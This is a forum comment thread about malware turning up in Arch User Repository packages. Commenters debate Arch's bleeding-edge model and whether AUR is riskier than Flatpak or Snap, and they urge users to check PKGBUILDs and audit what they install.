And others… https://lemdro.id/post/25813192
Man that’s why I don’t use Arch. it’s the wild west.
In seeking to have all the latest bleeding edge software updates, you end up with malade like this because nobody has time to properly check anything .
Most all the major distros have a way to install things outside of the project’s official repos. And this is a “people didn’t look at the PKGBUILD” issue, nothing to do with “bleeding edge” FUD.
This has been an issue with other distros in the past.
AUR is kinda the wild west. But also, in today’s cybersecurity climate, you really shouldn’t expect zero vulnerabilities. You should, however, expect prompt reporting of incidents. If you believe that no news is good news, then you’re burying your head in the sand.
That’s a good point.
The same can be said with flatpaks.
Let me reply again to you comment.
The same cannot be said of flatpaks. AUR stands for Arch User Repo, which is a user-driven unofficial package source. Flatpak on the other hand has some official channels for certain software applications like Firefox for example.
Now I’ve never used Arch or AUR, so correct me if I’m wrong, but I don’t think AUR has official software channels like flatpak does. Right?
If I’m right, flatpak definitely is a lot safer than AUR. As long as you don’t download your flatpaks from unofficial channels. This is actually a good advantage for Snaps which are thoroughly checked by Canonical.
Plus packages are manually inspected to ensure they meet Flathubs packaging requirements.
~~Absolutely. ~~
Actually, no. On second thought, let me reply again so you can see my new answer.
Just be aware of what you are installing. And do your best to audit your system regularly. Switching to a bleeding edge distro, and using thebAUr absolutely comes with risks. But it is up to the user to be aware of what they are installing. This goes for any OS. Be aware of what you are installing.
This can happen on any OS you install software willy nilly with no thought behind it.
